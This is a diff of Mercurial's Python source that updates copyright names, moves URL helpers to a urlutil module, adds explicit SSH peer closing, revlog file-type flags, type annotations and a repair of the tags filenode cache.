--- a/mercurial/similar.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/similar.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# similar.py - mechanisms for finding similar files
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/simplemerge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/simplemerge.py Tue Apr 20 11:01:06 2021 -0400
@@ -19,7 +19,7 @@
from __future__ import absolute_import
from .i18n import _
-from .node import nullid
+from .node import nullrev
from . import (
error,
mdiff,
@@ -402,31 +402,6 @@
return sl
- def find_unconflicted(self):
- """Return a list of ranges in base that are not conflicted."""
- am = mdiff.get_matching_blocks(self.basetext, self.atext)
- bm = mdiff.get_matching_blocks(self.basetext, self.btext)
-
- unc = []
-
- while am and bm:
- # there is an unconflicted block at i; how long does it
- # extend? until whichever one ends earlier.
- a1 = am[0][0]
- a2 = a1 + am[0][2]
- b1 = bm[0][0]
- b2 = b1 + bm[0][2]
- i = intersect((a1, a2), (b1, b2))
- if i:
- unc.append(i)
-
- if a2 < b2:
- del am[0]
- else:
- del bm[0]
-
- return unc
-
def _verifytext(text, path, ui, opts):
"""verifies that text is non-binary (unless opts[text] is passed,
@@ -452,7 +427,7 @@
def is_not_null(ctx):
if not util.safehasattr(ctx, "node"):
return False
- return ctx.node() != nullid
+ return ctx.rev() != nullrev
def _mergediff(m3, name_a, name_b, name_base):
--- a/mercurial/smartset.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/smartset.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# smartset.py - data structure for revision set
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/sshpeer.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/sshpeer.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# sshpeer.py - ssh repository proxy class for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -24,6 +24,7 @@
from .utils import (
procutil,
stringutil,
+ urlutil,
)
@@ -40,7 +41,7 @@
"""display all data currently available on pipe as remote output.
This is non blocking."""
- if pipe:
+ if pipe and not pipe.closed:
s = procutil.readpipe(pipe)
if s:
display = ui.warn if warn else ui.status
@@ -140,18 +141,26 @@
def close(self):
return self._main.close()
+ @property
+ def closed(self):
+ return self._main.closed
+
def flush(self):
return self._main.flush()
-def _cleanuppipes(ui, pipei, pipeo, pipee):
+def _cleanuppipes(ui, pipei, pipeo, pipee, warn):
"""Clean up pipes used by an SSH connection."""
- if pipeo:
+ didsomething = False
+ if pipeo and not pipeo.closed:
+ didsomething = True
pipeo.close()
- if pipei:
+ if pipei and not pipei.closed:
+ didsomething = True
pipei.close()
- if pipee:
+ if pipee and not pipee.closed:
+ didsomething = True
# Try to read from the err descriptor until EOF.
try:
for l in pipee:
@@ -161,6 +170,14 @@
pipee.close()
+ if didsomething and warn is not None:
+ # Encourage explicit close of sshpeers. Closing via __del__ is
+ # not very predictable when exceptions are thrown, which has led
+ # to deadlocks due to a peer get gc'ed in a fork
+ # We add our own stack trace, because the stacktrace when called
+ # from __del__ is useless.
+ ui.develwarn(b'missing close on SSH connection created at:\n%s' % warn)
+
def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None):
"""Create an SSH connection to a server.
@@ -412,6 +429,7 @@
self._pipee = stderr
self._caps = caps
self._autoreadstderr = autoreadstderr
+ self._initstack = b''.join(util.getstackframes(1))
# Commands that have a "framed" response where the first line of the
# response contains the length of that response.
@@ -434,7 +452,7 @@
return True
def close(self):
- pass
+ self._cleanup()
# End of ipeerconnection interface.
@@ -452,10 +470,11 @@
self._cleanup()
raise exception
- def _cleanup(self):
- _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee)
+ def _cleanup(self, warn=None):
+ _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee, warn=warn)
- __del__ = _cleanup
+ def __del__(self):
+ self._cleanup(warn=self._initstack)
def _sendrequest(self, cmd, args, framed=False):
if self.ui.debugflag and self.ui.configbool(
@@ -607,7 +626,7 @@
try:
protoname, caps = _performhandshake(ui, stdin, stdout, stderr)
except Exception:
- _cleanuppipes(ui, stdout, stdin, stderr)
+ _cleanuppipes(ui, stdout, stdin, stderr, warn=None)
raise
if protoname == wireprototypes.SSHV1:
@@ -633,7 +652,7 @@
autoreadstderr=autoreadstderr,
)
else:
- _cleanuppipes(ui, stdout, stdin, stderr)
+ _cleanuppipes(ui, stdout, stdin, stderr, warn=None)
raise error.RepoError(
_(b'unknown version of SSH protocol: %s') % protoname
)
@@ -644,11 +663,11 @@
The returned object conforms to the ``wireprotov1peer.wirepeer`` interface.
"""
- u = util.url(path, parsequery=False, parsefragment=False)
+ u = urlutil.url(path, parsequery=False, parsefragment=False)
if u.scheme != b'ssh' or not u.host or u.path is None:
raise error.RepoError(_(b"couldn't parse location %s") % path)
- util.checksafessh(path)
+ urlutil.checksafessh(path)
if u.passwd is not None:
raise error.RepoError(_(b'password in URL not supported'))
--- a/mercurial/sslutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/sslutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# sslutil.py - SSL handling for mercurial
#
-# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
--- a/mercurial/stack.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/stack.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# stack.py - Mercurial functions for stack definition
#
-# Copyright Matt Mackall <mpm@selenic.com> and other
+# Copyright Olivia Mackall <olivia@selenic.com> and other
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/statichttprepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/statichttprepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# This provides read-only repo access to repositories exported via static http
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -12,6 +12,7 @@
import errno
from .i18n import _
+from .node import sha1nodeconstants
from . import (
branchmap,
changelog,
@@ -25,6 +26,9 @@
util,
vfs as vfsmod,
)
+from .utils import (
+ urlutil,
+)
urlerr = util.urlerr
urlreq = util.urlreq
@@ -161,7 +165,7 @@
self.ui = ui
self.root = path
- u = util.url(path.rstrip(b'/') + b"/.hg")
+ u = urlutil.url(path.rstrip(b'/') + b"/.hg")
self.path, authinfo = u.authinfo()
vfsclass = build_opener(ui, authinfo)
@@ -172,6 +176,7 @@
self.names = namespaces.namespaces()
self.filtername = None
self._extrafilterid = None
+ self._wanted_sidedata = set()
try:
requirements = set(self.vfs.read(b'requires').splitlines())
@@ -197,6 +202,8 @@
requirements, supportedrequirements
)
localrepo.ensurerequirementscompatible(ui, requirements)
+ self.nodeconstants = sha1nodeconstants
+ self.nullid = self.nodeconstants.nullid
# setup store
self.store = localrepo.makestore(requirements, self.path, vfsclass)
@@ -206,7 +213,7 @@
self._filecache = {}
self.requirements = requirements
- rootmanifest = manifest.manifestrevlog(self.svfs)
+ rootmanifest = manifest.manifestrevlog(self.nodeconstants, self.svfs)
self.manifestlog = manifest.manifestlog(
self.svfs, self, rootmanifest, self.narrowmatch()
)
--- a/mercurial/store.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/store.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# store.py - repository store handling for Mercurial
#
-# Copyright 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -10,6 +10,7 @@
import errno
import functools
import os
+import re
import stat
from .i18n import _
@@ -387,13 +388,58 @@
b'requires',
]
+REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored')
+REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored')
+# files that are "volatile" and might change between listing and streaming
+#
+# note: the ".nd" file are nodemap data and won't "change" but they might be
+# deleted.
+REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd')
-def isrevlog(f, kind, st):
+# some exception to the above matching
+EXCLUDED = re.compile(b'.*undo\.[^/]+\.nd?$')
+
+
+def is_revlog(f, kind, st):
if kind != stat.S_IFREG:
- return False
- if f[-2:] in (b'.i', b'.d', b'.n'):
- return True
- return f[-3:] == b'.nd'
+ return None
+ return revlog_type(f)
+
+
+def revlog_type(f):
+ if f.endswith(REVLOG_FILES_MAIN_EXT):
+ return FILEFLAGS_REVLOG_MAIN
+ elif f.endswith(REVLOG_FILES_OTHER_EXT) and EXCLUDED.match(f) is None:
+ t = FILETYPE_FILELOG_OTHER
+ if f.endswith(REVLOG_FILES_VOLATILE_EXT):
+ t |= FILEFLAGS_VOLATILE
+ return t
+
+
+# the file is part of changelog data
+FILEFLAGS_CHANGELOG = 1 << 13
+# the file is part of manifest data
+FILEFLAGS_MANIFESTLOG = 1 << 12
+# the file is part of filelog data
+FILEFLAGS_FILELOG = 1 << 11
+# file that are not directly part of a revlog
+FILEFLAGS_OTHER = 1 << 10
+
+# the main entry point for a revlog
+FILEFLAGS_REVLOG_MAIN = 1 << 1
+# a secondary file for a revlog
+FILEFLAGS_REVLOG_OTHER = 1 << 0
+
+# files that are "volatile" and might change between listing and streaming
+FILEFLAGS_VOLATILE = 1 << 20
+
+FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN
+FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER
+FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN
+FILETYPE_MANIFESTLOG_OTHER = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_OTHER
+FILETYPE_FILELOG_MAIN = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN
+FILETYPE_FILELOG_OTHER = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_OTHER
+FILETYPE_OTHER = FILEFLAGS_OTHER
class basicstore(object):
@@ -411,7 +457,7 @@
def join(self, f):
return self.path + b'/' + encodedir(f)
- def _walk(self, relpath, recurse, filefilter=isrevlog):
+ def _walk(self, relpath, recurse):
'''yields (unencoded, encoded, size)'''
path = self.path
if relpath:
@@ -425,30 +471,46 @@
p = visit.pop()
for f, kind, st in readdir(p, stat=True):
fp = p + b'/' + f
- if filefilter(f, kind, st):
+ rl_type = is_revlog(f, kind, st)
+ if rl_type is not None:
n = util.pconvert(fp[striplen:])
- l.append((decodedir(n), n, st.st_size))
+ l.append((rl_type, decodedir(n), n, st.st_size))
elif kind == stat.S_IFDIR and recurse:
visit.append(fp)
l.sort()
return l
- def changelog(self, trypending):
- return changelog.changelog(self.vfs, trypending=trypending)
+ def changelog(self, trypending, concurrencychecker=None):
+ return changelog.changelog(
+ self.vfs,
+ trypending=trypending,
+ concurrencychecker=concurrencychecker,
+ )
def manifestlog(self, repo, storenarrowmatch):
- rootstore = manifest.manifestrevlog(self.vfs)
+ rootstore = manifest.manifestrevlog(repo.nodeconstants, self.vfs)
return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch)
def datafiles(self, matcher=None):
- return self._walk(b'data', True) + self._walk(b'meta', True)
+ files = self._walk(b'data', True) + self._walk(b'meta', True)
+ for (t, u, e, s) in files:
+ yield (FILEFLAGS_FILELOG | t, u, e, s)
def topfiles(self):
# yield manifest before changelog
- return reversed(self._walk(b'', False))
+ files = reversed(self._walk(b'', False))
+ for (t, u, e, s) in files:
+ if u.startswith(b'00changelog'):
+ yield (FILEFLAGS_CHANGELOG | t, u, e, s)
+ elif u.startswith(b'00manifest'):
+ yield (FILEFLAGS_MANIFESTLOG | t, u, e, s)
+ else:
+ yield (FILETYPE_OTHER | t, u, e, s)
def walk(self, matcher=None):
- """yields (unencoded, encoded, size)
+ """return file related to data storage (ie: revlogs)
+
+ yields (file_type, unencoded, encoded, size)
if a matcher is passed, storage files of only those tracked paths
are passed with matches the matcher
@@ -494,14 +556,14 @@
self.opener = self.vfs
def datafiles(self, matcher=None):
- for a, b, size in super(encodedstore, self).datafiles():
+ for t, a, b, size in super(encodedstore, self).datafiles():
try:
a = decodefilename(a)
except KeyError:
a = None
if a is not None and not _matchtrackedpath(a, matcher):
continue
- yield a, b, size
+ yield t, a, b, size
def join(self, f):
return self.path + b'/' + encodefilename(f)
@@ -690,7 +752,9 @@
continue
ef = self.encode(f)
try:
- yield f, ef, self.getsize(ef)
+ t = revlog_type(f)
+ t |= FILEFLAGS_FILELOG
+ yield t, f, ef, self.getsize(ef)
except OSError as err:
if err.errno != errno.ENOENT:
raise
--- a/mercurial/streamclone.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/streamclone.py Tue Apr 20 11:01:06 2021 -0400
@@ -20,6 +20,7 @@
narrowspec,
phases,
pycompat,
+ requirements as requirementsmod,
scmutil,
store,
util,
@@ -83,7 +84,7 @@
# is advertised and contains a comma-delimited list of requirements.
requirements = set()
if remote.capable(b'stream'):
- requirements.add(b'revlogv1')
+ requirements.add(requirementsmod.REVLOGV1_REQUIREMENT)
else:
streamreqs = remote.capable(b'streamreqs')
# This is weird and shouldn't happen with modern servers.
@@ -242,10 +243,12 @@
# Get consistent snapshot of repo, lock during scan.
with repo.lock():
repo.ui.debug(b'scanning\n')
- for name, ename, size in _walkstreamfiles(repo):
+ for file_type, name, ename, size in _walkstreamfiles(repo):
if size:
entries.append((name, size))
total_bytes += size
+ _test_sync_point_walk_1(repo)
+ _test_sync_point_walk_2(repo)
repo.ui.debug(
b'%d files, %d bytes to transfer\n' % (len(entries), total_bytes)
@@ -592,6 +595,14 @@
fp.close()
+def _test_sync_point_walk_1(repo):
+ """a function for synchronisation during tests"""
+
+
+def _test_sync_point_walk_2(repo):
+ """a function for synchronisation during tests"""
+
+
def generatev2(repo, includes, excludes, includeobsmarkers):
"""Emit content for version 2 of a streaming clone.
@@ -615,9 +626,12 @@
matcher = narrowspec.match(repo.root, includes, excludes)
repo.ui.debug(b'scanning\n')
- for name, ename, size in _walkstreamfiles(repo, matcher):
+ for rl_type, name, ename, size in _walkstreamfiles(repo, matcher):
if size:
- entries.append((_srcstore, name, _fileappend, size))
+ ft = _fileappend
+ if rl_type & store.FILEFLAGS_VOLATILE:
+ ft = _filefull
+ entries.append((_srcstore, name, ft, size))
totalfilesize += size
for name in _walkstreamfullstorefiles(repo):
if repo.svfs.exists(name):
@@ -634,6 +648,8 @@
chunks = _emit2(repo, entries, totalfilesize)
first = next(chunks)
assert first is None
+ _test_sync_point_walk_1(repo)
+ _test_sync_point_walk_2(repo)
return len(entries), totalfilesize, chunks
--- a/mercurial/subrepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/subrepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# subrepo.py - sub-repository classes and factory
#
-# Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -44,6 +44,7 @@
dateutil,
hashutil,
procutil,
+ urlutil,
)
hg = None
@@ -57,8 +58,8 @@
"""
get a path or url and if it is a path expand it and return an absolute path
"""
- expandedpath = util.urllocalpath(util.expandpath(path))
- u = util.url(expandedpath)
+ expandedpath = urlutil.urllocalpath(util.expandpath(path))
+ u = urlutil.url(expandedpath)
if not u.scheme:
path = util.normpath(os.path.abspath(u.path))
return path
@@ -716,13 +717,17 @@
_(b'sharing subrepo %s from %s\n')
% (subrelpath(self), srcurl)
)
- shared = hg.share(
- self._repo._subparent.baseui,
- getpeer(),
- self._repo.root,
- update=False,
- bookmarks=False,
- )
+ peer = getpeer()
+ try:
+ shared = hg.share(
+ self._repo._subparent.baseui,
+ peer,
+ self._repo.root,
+ update=False,
+ bookmarks=False,
+ )
+ finally:
+ peer.close()
self._repo = shared.local()
else:
# TODO: find a common place for this and this code in the
@@ -741,26 +746,34 @@
self.ui.status(
_(b'cloning subrepo %s from %s\n')
- % (subrelpath(self), util.hidepassword(srcurl))
+ % (subrelpath(self), urlutil.hidepassword(srcurl))
)
- other, cloned = hg.clone(
- self._repo._subparent.baseui,
- {},
- getpeer(),
- self._repo.root,
- update=False,
- shareopts=shareopts,
- )
+ peer = getpeer()
+ try:
+ other, cloned = hg.clone(
+ self._repo._subparent.baseui,
+ {},
+ peer,
+ self._repo.root,
+ update=False,
+ shareopts=shareopts,
+ )
+ finally:
+ peer.close()
self._repo = cloned.local()
self._initrepo(parentrepo, source, create=True)
self._cachestorehash(srcurl)
else:
self.ui.status(
_(b'pulling subrepo %s from %s\n')
- % (subrelpath(self), util.hidepassword(srcurl))
+ % (subrelpath(self), urlutil.hidepassword(srcurl))
)
cleansub = self.storeclean(srcurl)
- exchange.pull(self._repo, getpeer())
+ peer = getpeer()
+ try:
+ exchange.pull(self._repo, peer)
+ finally:
+ peer.close()
if cleansub:
# keep the repo clean after pull
self._cachestorehash(srcurl)
@@ -837,15 +850,18 @@
if self.storeclean(dsturl):
self.ui.status(
_(b'no changes made to subrepo %s since last push to %s\n')
- % (subrelpath(self), util.hidepassword(dsturl))
+ % (subrelpath(self), urlutil.hidepassword(dsturl))
)
return None
self.ui.status(
_(b'pushing subrepo %s to %s\n')
- % (subrelpath(self), util.hidepassword(dsturl))
+ % (subrelpath(self), urlutil.hidepassword(dsturl))
)
other = hg.peer(self._repo, {b'ssh': ssh}, dsturl)
- res = exchange.push(self._repo, other, force, newbranch=newbranch)
+ try:
+ res = exchange.push(self._repo, other, force, newbranch=newbranch)
+ finally:
+ other.close()
# the repo is now clean
self._cachestorehash(dsturl)
@@ -857,7 +873,8 @@
opts = copy.copy(opts)
opts.pop(b'rev', None)
opts.pop(b'branch', None)
- return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
+ subpath = subrepoutil.repo_rel_or_abs_source(self._repo)
+ return hg.outgoing(ui, self._repo, dest, opts, subpath=subpath)
@annotatesubrepoerror
def incoming(self, ui, source, opts):
@@ -865,7 +882,8 @@
opts = copy.copy(opts)
opts.pop(b'rev', None)
opts.pop(b'branch', None)
- return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
+ subpath = subrepoutil.repo_rel_or_abs_source(self._repo)
+ return hg.incoming(ui, self._repo, source, opts, subpath=subpath)
@annotatesubrepoerror
def files(self):
@@ -1269,7 +1287,7 @@
args.append(b'%s@%s' % (state[0], state[1]))
# SEC: check that the ssh url is safe
- util.checksafessh(state[0])
+ urlutil.checksafessh(state[0])
status, err = self._svncommand(args, failok=True)
_sanitize(self.ui, self.wvfs, b'.svn')
@@ -1567,7 +1585,7 @@
def _fetch(self, source, revision):
if self._gitmissing():
# SEC: check for safe ssh url
- util.checksafessh(source)
+ urlutil.checksafessh(source)
source = self._abssource(source)
self.ui.status(
--- a/mercurial/subrepoutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/subrepoutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# subrepoutil.py - sub-repository operations and substate handling
#
-# Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -23,12 +23,36 @@
pycompat,
util,
)
-from .utils import stringutil
+from .utils import (
+ stringutil,
+ urlutil,
+)
nullstate = (b'', b'', b'empty')
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Any,
+ Dict,
+ List,
+ Optional,
+ Set,
+ Tuple,
+ )
+ from . import (
+ context,
+ localrepo,
+ match as matchmod,
+ scmutil,
+ subrepo,
+ ui as uimod,
+ )
+
+ Substate = Dict[bytes, Tuple[bytes, bytes, bytes]]
+
def state(ctx, ui):
+ # type: (context.changectx, uimod.ui) -> Substate
"""return a state dict, mapping subrepo paths configured in .hgsub
to tuple: (source from .hgsub, revision from .hgsubstate, kind
(key in types dict))
@@ -84,6 +108,7 @@
raise
def remap(src):
+ # type: (bytes) -> bytes
for pattern, repl in p.items(b'subpaths'):
# Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
# does a string decode.
@@ -105,7 +130,7 @@
return src
state = {}
- for path, src in p[b''].items():
+ for path, src in p.items(b''): # type: bytes
kind = b'hg'
if src.startswith(b'['):
if b']' not in src:
@@ -114,10 +139,10 @@
kind = kind[1:]
src = src.lstrip() # strip any extra whitespace after ']'
- if not util.url(src).isabs():
+ if not urlutil.url(src).isabs():
parent = _abssource(repo, abort=False)
if parent:
- parent = util.url(parent)
+ parent = urlutil.url(parent)
parent.path = posixpath.join(parent.path or b'', src)
parent.path = posixpath.normpath(parent.path)
joined = bytes(parent)
@@ -136,6 +161,7 @@
def writestate(repo, state):
+ # type: (localrepo.localrepository, Substate) -> None
"""rewrite .hgsubstate in (outer) repo with these subrepo states"""
lines = [
b'%s %s\n' % (state[s][1], s)
@@ -146,6 +172,8 @@
def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
+ # type: (localrepo.localrepository, context.workingctx, context.changectx, context.changectx, bool, Optional[Any]) -> Substate
+ # TODO: type the `labels` arg
"""delegated from merge.applyupdates: merging of .hgsubstate file
in working context, merging context and ancestor context"""
if mctx == actx: # backwards?
@@ -285,6 +313,7 @@
def precommit(ui, wctx, status, match, force=False):
+ # type: (uimod.ui, context.workingcommitctx, scmutil.status, matchmod.basematcher, bool) -> Tuple[List[bytes], Set[bytes], Substate]
"""Calculate .hgsubstate changes that should be applied before committing
Returns (subs, commitsubs, newstate) where
@@ -354,7 +383,26 @@
return subs, commitsubs, newstate
+def repo_rel_or_abs_source(repo):
+ """return the source of this repo
+
+ Either absolute or relative the outermost repo"""
+ parent = repo
+ chunks = []
+ while util.safehasattr(parent, b'_subparent'):
+ source = urlutil.url(parent._subsource)
+ chunks.append(bytes(source))
+ if source.isabs():
+ break
+ parent = parent._subparent
+
+ chunks.reverse()
+ path = posixpath.join(*chunks)
+ return posixpath.normpath(path)
+
+
def reporelpath(repo):
+ # type: (localrepo.localrepository) -> bytes
"""return path to this (sub)repo as seen from outermost repo"""
parent = repo
while util.safehasattr(parent, b'_subparent'):
@@ -363,21 +411,23 @@
def subrelpath(sub):
+ # type: (subrepo.abstractsubrepo) -> bytes
"""return path to this subrepo as seen from outermost repo"""
return sub._relpath
def _abssource(repo, push=False, abort=True):
+ # type: (localrepo.localrepository, bool, bool) -> Optional[bytes]
"""return pull/push path of repo - either based on parent repo .hgsub info
or on the top repo config. Abort or return None if no source found."""
if util.safehasattr(repo, b'_subparent'):
- source = util.url(repo._subsource)
+ source = urlutil.url(repo._subsource)
if source.isabs():
return bytes(source)
source.path = posixpath.normpath(source.path)
parent = _abssource(repo._subparent, push, abort=False)
if parent:
- parent = util.url(util.pconvert(parent))
+ parent = urlutil.url(util.pconvert(parent))
parent.path = posixpath.join(parent.path or b'', source.path)
parent.path = posixpath.normpath(parent.path)
return bytes(parent)
@@ -406,7 +456,7 @@
#
# D:\>python -c "import os; print os.path.abspath('C:relative')"
# C:\some\path\relative
- if util.hasdriveletter(path):
+ if urlutil.hasdriveletter(path):
if len(path) == 2 or path[2:3] not in br'\/':
path = os.path.abspath(path)
return path
@@ -416,6 +466,7 @@
def newcommitphase(ui, ctx):
+ # type: (uimod.ui, context.changectx) -> int
commitphase = phases.newcommitphase(ui)
substate = getattr(ctx, "substate", None)
if not substate:
--- a/mercurial/tags.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/tags.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# tags.py - read tag info from local repository
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com>
+# Copyright 2009 Olivia Mackall <olivia@selenic.com>
# Copyright 2009 Greg Ward <greg@gerg.ca>
#
# This software may be used and distributed according to the terms of the
@@ -494,11 +494,25 @@
starttime = util.timer()
fnodescache = hgtagsfnodescache(repo.unfiltered())
cachefnode = {}
+ validated_fnodes = set()
+ unknown_entries = set()
for node in nodes:
fnode = fnodescache.getfnode(node)
+ flog = repo.file(b'.hgtags')
if fnode != nullid:
+ if fnode not in validated_fnodes:
+ if flog.hasnode(fnode):
+ validated_fnodes.add(fnode)
+ else:
+ unknown_entries.add(node)
cachefnode[node] = fnode
+ if unknown_entries:
+ fixed_nodemap = fnodescache.refresh_invalid_nodes(unknown_entries)
+ for node, fnode in pycompat.iteritems(fixed_nodemap):
+ if fnode != nullid:
+ cachefnode[node] = fnode
+
fnodescache.write()
duration = util.timer() - starttime
@@ -733,6 +747,7 @@
if rawlen < wantedlen:
if self._dirtyoffset is None:
self._dirtyoffset = rawlen
+ # TODO: zero fill entire record, because it's invalid not missing?
self._raw.extend(b'\xff' * (wantedlen - rawlen))
def getfnode(self, node, computemissing=True):
@@ -740,7 +755,8 @@
If the value is in the cache, the entry will be validated and returned.
Otherwise, the filenode will be computed and returned unless
- "computemissing" is False, in which case None will be returned without
+ "computemissing" is False. In that case, None will be returned if
+ the entry is missing or False if the entry is invalid without
any potentially expensive computation being performed.
If an .hgtags does not exist at the specified revision, nullid is
@@ -771,8 +787,19 @@
# If we get here, the entry is either missing or invalid.
if not computemissing:
+ if record != _fnodesmissingrec:
+ return False
return None
+ fnode = self._computefnode(node)
+ self._writeentry(offset, properprefix, fnode)
+ return fnode
+
+ def _computefnode(self, node):
+ """Finds the tag filenode for a node which is missing or invalid
+ in cache"""
+ ctx = self._repo[node]
+ rev = ctx.rev()
fnode = None
cl = self._repo.changelog
p1rev, p2rev = cl._uncheckedparentrevs(rev)
@@ -788,7 +815,7 @@
# we cannot rely on readfast because we don't know against what
# parent the readfast delta is computed
p1fnode = None
- if p1fnode is not None:
+ if p1fnode:
mctx = ctx.manifestctx()
fnode = mctx.readfast().get(b'.hgtags')
if fnode is None:
@@ -800,8 +827,6 @@
except error.LookupError:
# No .hgtags file on this revision.
fnode = nullid
-
- self._writeentry(offset, properprefix, fnode)
return fnode
def setfnode(self, node, fnode):
@@ -815,6 +840,21 @@
self._writeentry(ctx.rev() * _fnodesrecsize, node[0:4], fnode)
+ def refresh_invalid_nodes(self, nodes):
+ """recomputes file nodes for a given set of nodes which has unknown
+ filenodes for them in the cache
+ Also updates the in-memory cache with the correct filenode.
+ Caller needs to take care about calling `.write()` so that updates are
+ persisted.
+ Returns a map {node: recomputed fnode}
+ """
+ fixed_nodemap = {}
+ for node in nodes:
+ fnode = self._computefnode(node)
+ fixed_nodemap[node] = fnode
+ self.setfnode(node, fnode)
+ return fixed_nodemap
+
def _writeentry(self, offset, prefix, fnode):
# Slices on array instances only accept other array.
entry = bytearray(prefix + fnode)
--- a/mercurial/templatefilters.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templatefilters.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templatefilters.py - common template expansion filters
#
-# Copyright 2005-2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/templatefuncs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templatefuncs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templatefuncs.py - common template functions
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/templatekw.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templatekw.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templatekw.py - common changeset template keywords
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/templater.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/templater.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# templater.py - template expansion for output
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -891,7 +891,7 @@
fp = _open_mapfile(path)
cache, tmap, aliases = _readmapfile(fp, path)
- for key, val in conf[b'templates'].items():
+ for key, val in conf.items(b'templates'):
if not val:
raise error.ParseError(
_(b'missing value'), conf.source(b'templates', key)
@@ -904,7 +904,7 @@
cache[key] = unquotestring(val)
elif key != b'__base__':
